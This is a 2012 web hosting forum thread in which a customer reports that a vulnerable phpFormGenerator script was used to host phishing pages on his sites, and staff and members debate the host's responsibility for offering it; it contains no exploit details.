PowWeb Forums - The Perfect Community for the Perfect Host  

Register now to interact with over 11,000 members! Registered users have Posting Privileges, free access to Private Messaging, Email Notifications and more.

Go Back   PowWeb Community Forums > The PowWeb Platform > PHP
User Name
Password
Register FAQ Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
Old 3-15-12, 07:30 PM   #1
ArVee
Registered
 
Join Date: Mar 2012
Location: Ill-annoy
Posts: 3
Reputation: 0
phpFormGenerator 2.09.c vulnerability

A web site I managewas the target of an exploit against phpFormGenerator 2.09.c.
Below are some links that document the exploit. The information has also been sent to powweb support.

Last edited by IanS; 3-16-12 at 05:04 AM.. Reason: Links removed. New members aren't allowed to post links.
ArVee is offline   Reply With Quote
Old 3-16-12, 04:18 PM   #2
Jim M
PowWeb Staff
 
Join Date: Sep 2011
Location: Phoenix, AZ
Posts: 93
Reputation: 76
Appreciate the heads-up. I've let management know and imagine they'll contact Simple Scripts to let them know.
Jim M is offline   Reply With Quote
Old 3-30-12, 10:29 PM   #3
ArVee
Registered
 
Join Date: Mar 2012
Location: Ill-annoy
Posts: 3
Reputation: 0
I'd like to get things straight, clear as it were. I had 2 sites suspended within the last month,(nithunder.com, aipandc.com) both after complaints from a 3rd party about phishing pages hosted on those sites. The only scripts being used on either site were Php Formgenerator. Both the phishing attempts took advantage of exploits that I found well documented from as far back as at least 2010. Perhaps I should have researched the script more closely before I installed it, live and learn I guess. Never mind that the script is offered in pow webs' install central package, the ultimate responsibility is mine when using software even if the assumption is that pow web has vetted the software it offers for use. Okay, I can live with that, what I have a hard time understanding is why is pow web still offering a script that is vulnerable to remote exploits?? I hope the security dept. did not need me to inform them of the documented weaknesses inherent in the Php Formgenerator script. Having said that, I have to wonder if other users of the script have had similar experiences with it. If so, why is it still being offered? If not, I have to assume that they will sooner or later. This was not a personal attack, just the luck of the draw, as far as I'm concerned. Why host a script that has proven vulnerabilities? Is it that the documented exploits do not threaten pow web security? and only constitute an issue with individual users? Does the security dept. feel that any problems are easily dealt with by suspending a site and placing the responsibility of any corrections on the users of said script? I hope you can understand the source of my confusion and can offer some glimmer of reason as to why the situation is as it is
ArVee is offline   Reply With Quote
Old 3-31-12, 03:17 PM   #4
Jim M
PowWeb Staff
 
Join Date: Sep 2011
Location: Phoenix, AZ
Posts: 93
Reputation: 76
Quote:
Originally Posted by ArVee View Post
Does the security dept. feel that any problems are easily dealt with by suspending a site and placing the responsibility of any corrections on the users of said script? I hope you can understand the source of my confusion and can offer some glimmer of reason as to why the situation is as it is
The User Agreement:
http://www.powweb.com/legal/legal_useragreement.bml
is actually very clear on who is responsible for apps like this: "Any security risks including, but not limited to, hacking, phishing and information piracy are the sole responsibility of the User."

That's pretty standard. We didn't write the Form Generator and don't maintain It, simply provide a means by which you can, if you wish, install it. Doing so, and any issues which result, are really your responsibility. We obviously don't want customer to upload vulnerable applications [believe me, I spend far too much of my day dealing with the fallout and trying to help with the resulting problems], but it's also important to note that PowWeb is not SimpleScripts, and so all I am able to do is pass information like this to the appropriate parties.

The bottom line is, due diligence. Before you install any third-party app, look into it. See if that's the latest version. Check for reports of vulnerabilities. For an ounce of prevention is definitely better than a ton of cure.
Jim M is offline   Reply With Quote
Old 4-1-12, 11:09 PM   #5
ArVee
Registered
 
Join Date: Mar 2012
Location: Ill-annoy
Posts: 3
Reputation: 0
I've already stated that I accept responsibility for the software I use, not a problem. I am just surprised that pow web would continue to offer a script that hasn't had its' vulnerabilities corrected, presumably by Simple Scripts. Wouldn't it be best practice to re-state the legal niceties, and provide users with a clear, specific, caution about what may happen if they use the script? I would think that such a policy would lessen the securitys' dept. workload, allowing them to concentrate their efforts on issues they consider mission critical....doesn't that make sense?? I know pow webs' staff are not omniscient and all powerful, and am only asking that , once verified, complaints about scripts offered are widely dispersed and appropriate cautions are presented, when justified. I am requesting that the security dept., become more interactive, in a public way, by offering their best assessment of any piece of software, they have verified ,may pose a danger to users. Such a policy leaves most of the 'legwork' to users, and only requires a response such as i have roughly sketched out, when those pieces of information gathered from users indicate further action is required. I am grateful for all the people working behind the scenes to insure the integrity and reliability of our data and sites. Things would be chaotic without their efforts, they deserve our appreciation and respect. I am just asking them to re-assess how they interact with users, I believe all would benefit from such a proposed change in our relationship.
Rick V.
ArVee is offline   Reply With Quote
Old 4-2-12, 11:18 AM   #6
entrecon
Custom User Title
 
entrecon's Avatar
 
Join Date: Aug 2006
Location: Michigan
Posts: 2,703
Reputation: 337
For the long time members of this forum it has been pretty standard to NOT use any of the provided scripts for multiple reasons. PowWeb is usually behind the curve in getting them updated. Besides, most of the long time members of this forum are a little bit more advanced in their knowledge and prefer the control of installing a script themselves.

That being said, like ArVee, I am surprised that the script with such a vulnarability is still on install central. With all of the newbies who buy hosting here, it is like handing them a real gun and sending them out into a Paintball game. There is a certain assumption of safety when something is provided to you.
__________________
________________________________
Find me on twitter: @entrecon
entrecon is offline   Reply With Quote
Old 4-5-12, 03:14 PM   #7
Jim M
PowWeb Staff
 
Join Date: Sep 2011
Location: Phoenix, AZ
Posts: 93
Reputation: 76
Quote:
Originally Posted by ArVee View Post
I am requesting that the security dept., become more interactive, in a public way, by offering their best assessment of any piece of software, they have verified ,may pose a danger to users. Such a policy leaves most of the 'legwork' to users, and only requires a response such as i have roughly sketched out, when those pieces of information gathered from users indicate further action is required. I am grateful for all the people working behind the scenes to insure the integrity and reliability of our data and sites. Things would be chaotic without their efforts, they deserve our appreciation and respect. I am just asking them to re-assess how they interact with users, I believe all would benefit from such a proposed change in our relationship.
Rick V.
As mentioned before, PowWeb is not SimpleScripts. You may have missed that, when you click on the SimpleScripts icon in the control panel, you are no longer even on powweb.com, but are taken over to SimpleScripts.com. Obviously, we therefore do not have control over what statements are or are not present there.

What you say certainly makes sense. However, here is really not the best place to submit suggestions, because I'm technical support, not a business relationship manager. Going through the feedback form:
http://www.powweb.com/support/suggestions.bml
will get your suggestion in front of more appropriate eyes than posting in a forum.
Jim M is offline   Reply With Quote
Old 4-19-12, 09:46 PM   #8
swpowell
 
Join Date: Apr 2007
Location: Stockbridge, Ga
Posts: 459
Reputation: 80
Jim M, can you please take a look at the PM I sent you this evening.
Thanks.
swpowell is offline   Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 04:23 AM.


Contents ©PowWeb, Inc. ~ vBulletin, Copyright 2000-2007 Jelsoft Enterprises Limited.